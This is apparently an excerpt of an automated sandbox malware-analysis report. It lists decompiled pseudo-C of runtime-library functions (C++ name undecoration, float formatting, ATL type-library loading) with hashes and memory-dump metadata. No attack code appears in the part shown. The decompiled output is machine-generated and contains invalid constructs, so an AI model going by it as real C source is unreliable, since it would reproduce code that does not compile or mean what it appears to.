                      • Instruction Fuzzy Hash: 6BC12DB1D0010DEBDB04EF94DA92BEFB7B9AF98314F104558F505A7281DB74AE45CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00966AB0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				signed int _v24;
                      				char _v28;
                      				signed int _v32;
                      				char _v36;
                      				signed int _v40;
                      				char _v44;
                      				signed int _v48;
                      				char _v52;
                      				signed int _v56;
                      				char _v60;
                      				signed int _v64;
                      				char _v68;
                      				char _v76;
                      				char _v84;
                      				char _v92;
                      				char _v100;
                      				signed int _t93;
                      
                      				E0095F3F0( &_v20);
                      				_t93 =  *0xb30640; // 0x0
                      				_v8 =  *_t93;
                      				if(_v8 > 0x42) {
                      					L28:
                      					E00962CD0(_a4, _a8);
                      					return _a4;
                      				}
                      				_t5 = _v8 + 0x966e6c; // 0x6e189003
                      				switch( *((intOrPtr*)(( *_t5 & 0x000000ff) * 4 +  &M00966E58))) {
                      					case 0:
                      						E0095FB00(_t112, _a4, 1, _a8);
                      						return _a4;
                      					case 1:
                      						1 = 1 << 0;
                      						__ecx =  *0xb30640; // 0x0
                      						__edx =  *((char*)(__ecx + (1 << 0)));
                      						__eflags =  *((char*)(__ecx + (1 << 0))) - 0x24;
                      						if( *((char*)(__ecx + (1 << 0))) == 0x24) {
                      							__edx =  *0xb30640; // 0x0
                      							 *0xb30640 = __edx;
                      							__eax =  *0xb30640; // 0x0
                      							__ecx =  *__eax;
                      							_v12 =  *__eax;
                      							__eflags = _v12 - 0x59;
                      							if(__eflags > 0) {
                      								L27:
                      								__ecx = _a4;
                      								E0095F350(_a4, 2) = _a4;
                      								return _a4;
                      							}
                      							_t36 = _v12 + 0x966edc; // 0xcccccc09
                      							__eax =  *_t36 & 0x000000ff;
                      							switch( *((intOrPtr*)(( *_t36 & 0x000000ff) * 4 +  &M00966EB0))) {
                      								case 0:
                      									__eax = _a8;
                      									__ecx = _a4;
                      									E0095FB00(__eflags, _a4, 1, _a8) = _a4;
                      									return _a4;
                      								case 1:
                      									 *0xb30640 =  *0xb30640 + 1;
                      									 *0xb30640 =  *0xb30640 + 1;
                      									__edx = _a8;
                      									_a4 = E00965490(__ebx, __edi, __esi, _a4, _a8);
                      									__eax = _a4;
                      									return _a4;
                      								case 2:
                      									 *0xb30640 =  *0xb30640 + 1;
                      									 *0xb30640 =  *0xb30640 + 1;
                      									__edx = _a8;
                      									_a4 = L00966F40(__ebx, __edi, __esi, _a4, _a8, 1);
                      									__eax = _a4;
                      									return _a4;
                      								case 3:
                      									 *0xb30640 =  *0xb30640 + 1;
                      									 *0xb30640 =  *0xb30640 + 1;
                      									__ecx =  &_v92;
                      									__eax = E0095F3F0( &_v92);
                      									__edx = _a8;
                      									 &_v100 = E00963A20(__ebx, __edi, __esi,  &_v100, _a8, 0,  &_v100, 0);
                      									__ecx = _a4;
                      									__eax = _a4;
                      									return _a4;
                      								case 4:
                      									L19:
                      									__ecx = _a8;
                      									__ecx =  &_v84;
                      									__eax = E0095F240( &_v84, _a8);
                      									__edx =  *0xb30640; // 0x0
                      									 *0xb30640 = __edx;
                      									__ecx =  &_v84;
                      									E0096AB50( &_v84) =  &_v20;
                      									__ecx = _a4;
                      									E00967370(_a4,  &_v20,  &_v20, 3) = _a4;
                      									return _a4;
                      								case 5:
                      									__ecx = _a8;
                      									__eax = E0096A560(_a8);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										_v52 = E00960060("volatile", 8);
                      										_v48 = __edx;
                      										__eax =  &_v52;
                      										__ecx =  &_v20;
                      										__eax = E0095F7E0( &_v20,  &_v52);
                      									} else {
                      										_v44 = E00960060("volatile ", 9);
                      										_v40 = __edx;
                      										__edx =  &_v44;
                      										__ecx =  &_v20;
                      										__eax = E0095F7E0( &_v20,  &_v44);
                      									}
                      									goto L19;
                      								case 6:
                      									 *0xb30640 =  *0xb30640 + 1;
                      									 *0xb30640 =  *0xb30640 + 1;
                      									__ecx = _a4;
                      									E0095F350(_a4, 2) = _a4;
                      									return _a4;
                      								case 7:
                      									 *0xb30640 =  *0xb30640 + 1;
                      									 *0xb30640 =  *0xb30640 + 1;
                      									__ecx = _a8;
                      									__eax = E0096A560(_a8);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										_v68 = E00960060("std::nullptr_t", 0xe);
                      										_v64 = __edx;
                      										__ecx =  &_v68;
                      										__ecx = _a4;
                      										E0095F1F0(_a4,  &_v68) = _a4;
                      										return _a4;
                      									}
                      									_v60 = E00960060("std::nullptr_t ", 0xf);
                      									_v56 = __edx;
                      									__ecx = _a8;
                      									__edx =  &_v60;
                      									_a4 = E0095FAA0(_a4,  &_v60, _a8);
                      									__eax = _a4;
                      									return _a4;
                      								case 8:
                      									 *0xb30640 =  *0xb30640 + 1;
                      									 *0xb30640 =  *0xb30640 + 1;
                      									__edx = _a8;
                      									__ecx = _a4;
                      									E0095F240(_a4, _a8) = _a4;
                      									return _a4;
                      								case 9:
                      									 *0xb30640 =  *0xb30640 + 1;
                      									 *0xb30640 =  *0xb30640 + 1;
                      									_a4 = E00967B30(__ebx, __edi, __esi, __eflags, _a4);
                      									__eax = _a4;
                      									return _a4;
                      								case 0xa:
                      									goto L27;
                      							}
                      						}
                      						1 = 1 << 0;
                      						__ecx =  *0xb30640; // 0x0
                      						__edx =  *((char*)(__ecx + (1 << 0)));
                      						__eflags =  *((char*)(__ecx + (1 << 0)));
                      						if(__eflags == 0) {
                      							__eax = _a8;
                      							__ecx = _a4;
                      							E0095FB00(__eflags, _a4, 1, _a8) = _a4;
                      							return _a4;
                      						}
                      						__ecx = _a4;
                      						E0095F350(_a4, 2) = _a4;
                      						return _a4;
                      					case 2:
                      						L6:
                      						__edx = _a8;
                      						__ecx =  &_v76;
                      						__eax = E0095F240( &_v76, _a8);
                      						__eax =  *0xb30640; // 0x0
                      						 *0xb30640 = __eax;
                      						__ecx =  &_v76;
                      						__eax = E0096AB50( &_v76);
                      						__ecx =  &_v20;
                      						__edx = _a4;
                      						__eax = _a4;
                      						return _a4;
                      					case 3:
                      						__ecx = _a8;
                      						__eax = E0096A560(_a8);
                      						__eflags = __eax;
                      						if(__eax != 0) {
                      							_v36 = E00960060("volatile", 8);
                      							_v32 = __edx;
                      							__ecx =  &_v36;
                      							__ecx =  &_v20;
                      							__eax = E0095F7E0( &_v20,  &_v36);
                      						} else {
                      							_v28 = E00960060("volatile ", 9);
                      							_v24 = __edx;
                      							__eax =  &_v28;
                      							__ecx =  &_v20;
                      							__eax = E0095F7E0( &_v20,  &_v28);
                      						}
                      						goto L6;
                      					case 4:
                      						goto L28;
                      				}
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: operator+$EmptyIterator_baseIterator_base::_MailboxName::isName::setchar_traitsstd::_
                      • String ID: B$std::nullptr_t$std::nullptr_t $volatile$volatile
                      • API String ID: 1073764026-1853825697
                      • Opcode ID: 4c2151f5e9ad7f86f216909bcecb1ba8b84e5ea9defa968550a8c2ab5a2a1338
                      • Instruction ID: 3701c31062f68de2aca2d3fefdfb62a5d7cf8c43712494cc6d918d48ba43d90e
                      • Opcode Fuzzy Hash: 4c2151f5e9ad7f86f216909bcecb1ba8b84e5ea9defa968550a8c2ab5a2a1338
                      • Instruction Fuzzy Hash: 0BB161B5950108EBDB04EF94DCA2EEE3775BFC4304F148129F9099B255EB32EA54CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E0096A1E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, signed char _a12) {
                      				signed int _v8;
                      				char _v24;
                      				signed char _v25;
                      				signed char _v26;
                      				char _v36;
                      				intOrPtr _v40;
                      				signed int _v44;
                      				char _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				signed int _v80;
                      				char _v84;
                      				signed int _v88;
                      				char _v92;
                      				char _v100;
                      				char _v108;
                      				char _v116;
                      				char _v124;
                      				char _v132;
                      				char _v140;
                      				char _v148;
                      				char _v156;
                      				char _v164;
                      				signed int _t75;
                      				signed int _t77;
                      				signed int _t81;
                      				void* _t82;
                      				void* _t83;
                      				intOrPtr _t87;
                      				char _t115;
                      				char _t117;
                      				signed int _t118;
                      				signed int _t123;
                      				void* _t127;
                      				intOrPtr _t129;
                      				signed int _t131;
                      				intOrPtr _t139;
                      				intOrPtr _t140;
                      				signed int _t143;
                      				signed int _t158;
                      				signed int _t163;
                      				intOrPtr _t168;
                      				signed int _t169;
                      				signed int _t172;
                      				intOrPtr _t174;
                      				signed int _t180;
                      				signed int _t181;
                      				signed int _t184;
                      				void* _t185;
                      				void* _t186;
                      				signed int _t187;
                      				void* _t188;
                      				void* _t190;
                      				void* _t191;
                      
                      				_t186 = __esi;
                      				_t185 = __edi;
                      				_t127 = __ebx;
                      				_t75 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t75 ^ _t187;
                      				_t77 =  *0xb30640; // 0x0
                      				_t129 =  *_t77 - 0x30;
                      				_v40 = _t129;
                      				if(_t129 < 0 || _v40 > 9) {
                      					E0095F3F0( &_v36);
                      					_t169 =  *0xb30640; // 0x0
                      					if( *_t169 != 0x3f) {
                      						_v25 = 0;
                      						_v48 = E00960060(0x9fe94d, 0);
                      						_v44 = _t169;
                      						_t81 =  *0xb30640; // 0x0
                      						_t82 = E0096AC10(_t81, "template-parameter-", 0x13);
                      						_t190 = _t188 + 0x14;
                      						if(_t82 != 0) {
                      							_t131 =  *0xb30640; // 0x0
                      							_t83 = E0096AC10(_t131, "generic-type-", 0xd);
                      							_t191 = _t190 + 0xc;
                      							if(_t83 == 0) {
                      								_v25 = 1;
                      								_t115 = E00960060("`generic-type-", 0xe);
                      								_t191 = _t191 + 8;
                      								_v92 = _t115;
                      								_v88 = _t169;
                      								_v48 = _v92;
                      								_v44 = _v88;
                      								_t158 =  *0xb30640; // 0x0
                      								 *0xb30640 = _t158 + 0xd;
                      							}
                      						} else {
                      							_v25 = 1;
                      							_t117 = E00960060("`template-parameter-", 0x14);
                      							_t191 = _t190 + 8;
                      							_v84 = _t117;
                      							_v80 = _t169;
                      							_v48 = _v84;
                      							_v44 = _v80;
                      							_t118 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t118 + 0x13;
                      						}
                      						if((_v25 & 0x000000ff) == 0) {
                      							if((_a12 & 0x000000ff) == 0) {
                      								L26:
                      								E0095F820( &_v36, E0095F080( &_v164, 0xb30640, 0x40));
                      								goto L27;
                      							}
                      							_t172 =  *0xb30640; // 0x0
                      							if( *_t172 != 0x40) {
                      								goto L26;
                      							}
                      							E0095F820( &_v36, E0095F3F0( &_v156));
                      							_t143 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t143 + 1;
                      							goto L27;
                      						} else {
                      							E00967C80(_t127, _t185, _t186,  &_v100);
                      							if(E0096A510() == 0 ||  *0xb30650 == 0) {
                      								_v76 = E0095FAA0( &_v140,  &_v48,  &_v100);
                      								E0095F820( &_v36, E0095FBB0(_v76,  &_v148, 0x27));
                      							} else {
                      								E00967D80( &_v100,  &_v24, 0x10);
                      								_t174 =  *0xb30650; // 0x0
                      								_v68 = _t174;
                      								_v56 = _v68;
                      								 *0x9d62b0(E009A2B00( &_v24));
                      								_v60 = _v56();
                      								if(_v60 == 0) {
                      									_v72 = E0095FAA0( &_v124,  &_v48,  &_v100);
                      									E0095F820( &_v36, E0095FBB0(_v72,  &_v132, 0x27));
                      								} else {
                      									_v26 = 0;
                      									_push(_v26 & 0x000000ff);
                      									E0095F820( &_v36, E0095E750( &_v116, _v60));
                      								}
                      							}
                      							L27:
                      							_t171 = _a8 & 0x000000ff;
                      							if((_a8 & 0x000000ff) != 0) {
                      								_t139 =  *0xb30638; // 0x0
                      								if(E0096A590(_t139) == 0) {
                      									_t140 =  *0xb30638; // 0x0
                      									L0095FF70(_t140,  &_v36);
                      								}
                      							}
                      							E0095F240(_a4,  &_v36);
                      							_t87 = _a4;
                      							goto L31;
                      						}
                      					}
                      					E0095F820( &_v36, E00968500(_t127, _t185, _t186,  &_v108, 0));
                      					_t180 =  *0xb30640; // 0x0
                      					_v64 =  *_t180;
                      					_t163 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t163 + 1;
                      					if(_v64 != 0x40) {
                      						_t181 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t181 - 1;
                      						_t123 =  *0xb30640; // 0x0
                      						if( *_t123 == 0) {
                      							_v52 = 1;
                      						} else {
                      							_v52 = 2;
                      						}
                      						E0095F920( &_v36, _v52);
                      					}
                      					goto L27;
                      				} else {
                      					_t184 =  *0xb30640; // 0x0
                      					_t171 = _t184 + 1;
                      					 *0xb30640 = _t184 + 1;
                      					_t168 =  *0xb30638; // 0x0
                      					E0095F9A0(_t168, _a4, _v40);
                      					_t87 = _a4;
                      					L31:
                      					return E00957280(_t87, _t127, _v8 ^ _t187, _t171, _t185, _t186);
                      				}
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096A23B
                      • Mailbox.LIBCMTD ref: 0096A260
                      • DName::operator=.LIBVCRUNTIMED ref: 0096A2B8
                      • und_strncmp.LIBCMTD ref: 0096A2E8
                      • DName::getString.LIBCMTD ref: 0096A3B1
                      • Mailbox.LIBCMTD ref: 0096A404
                        • Part of subcall function 0095F9A0: DName::DName.LIBVCRUNTIMED ref: 0095F9B8
                      • Replicator::isFull.LIBCMTD ref: 0096A4D5
                      • Replicator::operator+=.LIBCMTD ref: 0096A4E8
                      • Mailbox.LIBCMTD ref: 0096A4F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$FullIterator_baseIterator_base::_NameName::Name::getName::operator=Replicator::isReplicator::operator+=Stringstd::_und_strncmp
                      • String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
                      • API String ID: 3194277874-3433397351
                      • Opcode ID: 1c3b10620952961c63f28214113d5c2d0f89e1916da84726797af11f80a5db72
                      • Instruction ID: 9fd8f9af40c3585705b50da140e183bcd31907392dcddc810b5694bbc07be207
                      • Opcode Fuzzy Hash: 1c3b10620952961c63f28214113d5c2d0f89e1916da84726797af11f80a5db72
                      • Instruction Fuzzy Hash: AAA18FB1D102189FDB14EFA4DCA2BEEBBB5BF84304F144029E80AB7265EB746904CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E009BC260(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, long long _a4, intOrPtr _a12, intOrPtr* _a16, char* _a20, char* _a24) {
                      				char _v5;
                      				void* _v6;
                      				signed char _v7;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				char _v56;
                      				signed int _t84;
                      				intOrPtr* _t100;
                      				void* _t103;
                      				intOrPtr* _t111;
                      				intOrPtr* _t112;
                      				signed int _t123;
                      				signed int _t127;
                      				intOrPtr _t136;
                      				void* _t141;
                      				void* _t142;
                      				void* _t143;
                      				void* _t144;
                      
                      				_t142 = __esi;
                      				_t141 = __edi;
                      				_t103 = __ebx;
                      				E009BAA30( &_v56, __edx, __eflags);
                      				_v12 =  &_a4;
                      				_t123 =  *(_v12 + 4);
                      				_v28 = E009CEEF0( *_v12, 0x3f, _t123) & 0x00000001;
                      				_v24 = _t123 & 0x00000000;
                      				if(_v28 != 1 || _v24 != 0) {
                      					_v5 = 0x20;
                      				} else {
                      					_v5 = 0x2d;
                      				}
                      				 *_a16 = _v5;
                      				 *((intOrPtr*)(_a16 + 8)) = _a20;
                      				_t127 =  *(_v12 + 4);
                      				_v36 = E009CEEF0( *_v12, 0x34, _t127) & 0x000007ff;
                      				_v32 = _t127 & 0x00000000;
                      				if((_v36 | _v32) != 0) {
                      					L7:
                      					_v6 = 0;
                      					goto L8;
                      				} else {
                      					_t100 = _v12;
                      					_v44 =  *_t100;
                      					_v40 =  *(_t100 + 4) & 0x000fffff;
                      					if((_v44 | _v40) != 0) {
                      						goto L7;
                      					}
                      					_v6 = 1;
                      					L8:
                      					_v7 = _v6;
                      					if((_v7 & 0x000000ff) == 0) {
                      						_t84 = E009A6D50(__eflags,  &_a4);
                      						_t144 = _t143 + 4;
                      						_v20 = _t84;
                      						__eflags = _v20;
                      						if(_v20 != 0) {
                      							 *((intOrPtr*)(_a16 + 4)) = 1;
                      						}
                      						_v16 = _v20;
                      						_v16 = _v16 - 1;
                      						__eflags = _v16 - 3;
                      						if(_v16 > 3) {
                      							_t111 = _v12;
                      							_t112 = _v12;
                      							 *_t112 =  *_t111;
                      							 *(_t112 + 4) =  *(_t111 + 4) & 0x7fffffff;
                      							_push(_a24);
                      							_push(_a20);
                      							_push(_a16 + 4);
                      							_t136 = _a12 + 1;
                      							__eflags = _t136;
                      							_push(_t136);
                      							 *((long long*)(_t144 - 8)) = _a4;
                      							E009BA370(_t103, _t141, _t142);
                      							return E009BAA80( &_v56);
                      						} else {
                      							switch( *((intOrPtr*)(_v16 * 4 +  &M009BC4E8))) {
                      								case 0:
                      									E00994A20(E00992DE0(_a20, _a24, "1#INF"), _t93, L"strcpy_s(result, result_count, \"1#INF\" )", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12b, 0);
                      									return E009BAA80( &_v56);
                      								case 1:
                      									__ecx = _a24;
                      									__edx = _a20;
                      									E00992DE0(_a20, _a24, "1#QNAN") = E00994A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#QNAN\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12c, 0);
                      									__ecx =  &_v56;
                      									return E009BAA80( &_v56);
                      								case 2:
                      									__eax = _a24;
                      									__ecx = _a20;
                      									E00992DE0(_a20, _a24, "1#SNAN") = E00994A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#SNAN\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12d, 0);
                      									__ecx =  &_v56;
                      									return E009BAA80( &_v56);
                      								case 3:
                      									__edx = _a24;
                      									__eax = _a20;
                      									E00992DE0(_a20, _a24, "1#IND") = E00994A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#IND\" )", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12e, 0);
                      									__ecx =  &_v56;
                      									return E009BAA80( &_v56);
                      							}
                      						}
                      					}
                      					 *((intOrPtr*)(_a16 + 4)) = 0;
                      					E00994A20(E00992DE0(_a20, _a24, "0"), _t97, L"strcpy_s(result, result_count, \"0\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x11e, 0);
                      					return E009BAA80( &_v56);
                      				}
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009BC33F
                      • __invoke_watson_if_error.LIBCMTD ref: 009BC348
                      • __aligned_msize.LIBCMTD ref: 009BC3C2
                      • __invoke_watson_if_error.LIBCMTD ref: 009BC3CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error
                      • String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
                      • API String ID: 4254006664-1152488507
                      • Opcode ID: 52a062bf24def20e943da5e3b4b3c5a0ce8754c9975faea8af971eca1e8a501b
                      • Instruction ID: d1b42850a1e243e77734608f0e45115a3d1aa7c4e786fabcbaae5c5e2053070e
                      • Opcode Fuzzy Hash: 52a062bf24def20e943da5e3b4b3c5a0ce8754c9975faea8af971eca1e8a501b
                      • Instruction Fuzzy Hash: 957181B0E00208EBCB04EF94DA92FEE7BB5AF98718F148458F50577282D675AA11CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E0094A1D0(void* __ebx, struct HINSTANCE__* _a4, signed int _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16) {
                      				signed int _v8;
                      				unsigned int _v16;
                      				intOrPtr _v24;
                      				signed int _v28;
                      				CHAR* _v32;
                      				char _v40;
                      				char _v320;
                      				signed int _v328;
                      				intOrPtr _v332;
                      				struct HINSTANCE__ _v336;
                      				signed int _v340;
                      				intOrPtr _v344;
                      				struct HINSTANCE__* _v348;
                      				signed int _v352;
                      				signed int _v356;
                      				char _v364;
                      				char _v368;
                      				intOrPtr _v376;
                      				intOrPtr _v380;
                      				intOrPtr _v384;
                      				intOrPtr _v388;
                      				intOrPtr _v392;
                      				intOrPtr _v396;
                      				intOrPtr _v400;
                      				signed int _v404;
                      				struct HINSTANCE__ _v412;
                      				struct HINSTANCE__* _v420;
                      				struct HINSTANCE__* _v424;
                      				intOrPtr _v428;
                      				intOrPtr _v432;
                      				intOrPtr _v436;
                      				struct HINSTANCE__* _v440;
                      				struct HINSTANCE__* _v444;
                      				intOrPtr _v448;
                      				intOrPtr _v452;
                      				intOrPtr _v456;
                      				struct HINSTANCE__* _v460;
                      				struct HINSTANCE__* _v464;
                      				intOrPtr _v468;
                      				intOrPtr _v472;
                      				char _v476;
                      				void* _v484;
                      				void* __edx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t202;
                      				void* _t204;
                      				intOrPtr _t205;
                      				void* _t207;
                      				long _t211;
                      				struct HINSTANCE__ _t213;
                      				signed int _t217;
                      				void* _t228;
                      				char _t231;
                      				signed int _t239;
                      				signed char _t247;
                      				signed char _t255;
                      				signed int _t263;
                      				intOrPtr _t269;
                      				signed char _t276;
                      				void* _t286;
                      				void* _t287;
                      				struct HINSTANCE__* _t344;
                      				void* _t346;
                      				char _t354;
                      				void* _t375;
                      				void* _t376;
                      				signed int _t378;
                      				void* _t379;
                      				intOrPtr _t380;
                      				intOrPtr _t382;
                      				void* _t384;
                      				void* _t387;
                      
                      				_t287 = __ebx;
                      				_t375 =  &_v476;
                      				memset(_t375, 0xcccccccc, 0x76 << 2);
                      				_t380 = _t379 + 0xc;
                      				_t376 = _t375 + 0x76;
                      				_t202 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t202 ^ _t378;
                      				_v412 = 0;
                      				if(_a12 == 0) {
                      					L2:
                      					_t204 = L00994930(_t390, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1bcb, 0, "%ls", L"pbstrPath != 0 && ppTypeLib != 0");
                      					_t380 = _t380 + 0x18;
                      					if(_t204 == 1) {
                      						asm("int3");
                      					}
                      					L4:
                      					if(_a12 == 0 || _a16 == 0) {
                      						_t205 = 0x80004003;
                      						goto L64;
                      					} else {
                      						 *_a12 = 0;
                      						 *_a16 = 0;
                      						_v16 = 0;
                      						_v24 = E00941AB0();
                      						_v28 = 0;
                      						_v32 = 0;
                      						E0094F2E0( &_v40);
                      						__eflags = _a4;
                      						if(__eflags == 0) {
                      							_t286 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1bd3, 0, "%ls", L"hInstTypeLib != 0");
                      							_t380 = _t380 + 0x18;
                      							__eflags = _t286 - 1;
                      							if(_t286 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						_t377 = _t380;
                      						_t344 = _a4;
                      						_t211 = GetModuleFileNameA(_t344,  &_v320, 0x104);
                      						__eflags = _t380 - _t380;
                      						_v328 = E009D1520(_t211, _t380 - _t380);
                      						__eflags = _v328;
                      						if(_v328 != 0) {
                      							__eflags = _v328 - 0x104;
                      							if(_v328 != 0x104) {
                      								_v336 = 0;
                      								_t213 = E009CFED0(_t377,  &_v320);
                      								_t382 = _t380 + 4;
                      								_v336 = _t213;
                      								__eflags = _a8;
                      								if(_a8 == 0) {
                      									L32:
                      									_v32 =  &_v320;
                      									__eflags = _v32;
                      									if(_v32 != 0) {
                      										_v16 = E00992E00(_v32) + 1;
                      										_t217 = E00941780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
                      										_t382 = _t382 + 0x10;
                      										__eflags = _t217;
                      										if(_t217 >= 0) {
                      											__eflags = _v16 - 0x400;
                      											if(__eflags > 0) {
                      												L39:
                      												_v456 = E0094F270(_t287,  &_v40, __eflags, _v16);
                      												L40:
                      												_t300 = _v16 >> 1;
                      												__eflags = _v16 >> 1;
                      												_v444 = E00941AC0(_v16 >> 1, _t377, _v456, _v32, _t300, _v24);
                      												L41:
                      												_v440 = _v444;
                      												L42:
                      												_t344 = _v440;
                      												_v352 = _t344;
                      												__eflags = _v352;
                      												if(_v352 != 0) {
                      													_t377 = _t382;
                      													__imp__#161(_v352, _a16);
                      													__eflags = _t382 - _t382;
                      													_v356 = E009D1520(_a16, _t382 - _t382);
                      													__eflags = _v356;
                      													if(_v356 >= 0) {
                      														L60:
                      														__eflags = _v356;
                      														if(_v356 >= 0) {
                      															_t377 = _t382;
                      															__imp__#2(_v352);
                      															__eflags = _t382 - _t382;
                      															 *_a12 = E009D1520(_t223, _t382 - _t382);
                      															_t344 = _a12;
                      															__eflags = _t344->i;
                      															if(_t344->i == 0) {
                      																_v356 = 0x8007000e;
                      																_t377 = _t382;
                      																_t344 =  *( *( *_a16) + 8);
                      																_t228 = _t344->i( *_a16);
                      																__eflags = _t382 - _t382;
                      																E009D1520(_t228, _t382 - _t382);
                      																 *_a16 = 0;
                      															}
                      														}
                      														_v404 = _v356;
                      														E0094F220( &_v40);
                      														_t205 = _v404;
                      														goto L64;
                      													}
                      													_t354 = ".tlb"; // 0x626c742e
                      													_v368 = _t354;
                      													_t231 =  *0x9ff704; // 0x0
                      													_v364 = _t231;
                      													_t344 =  &_v320;
                      													__eflags = _v336 - _t344 + 5 - 0x104;
                      													if(__eflags <= 0) {
                      														E009426C0(_t287, _t376, _t377, __eflags, _v336, 0x10e - _v336 -  &_v320,  &_v368);
                      														_t384 = _t382 + 0xc;
                      														_v32 =  &_v320;
                      														__eflags = _v32;
                      														if(_v32 != 0) {
                      															_v16 = E00992E00(_v32) + 1;
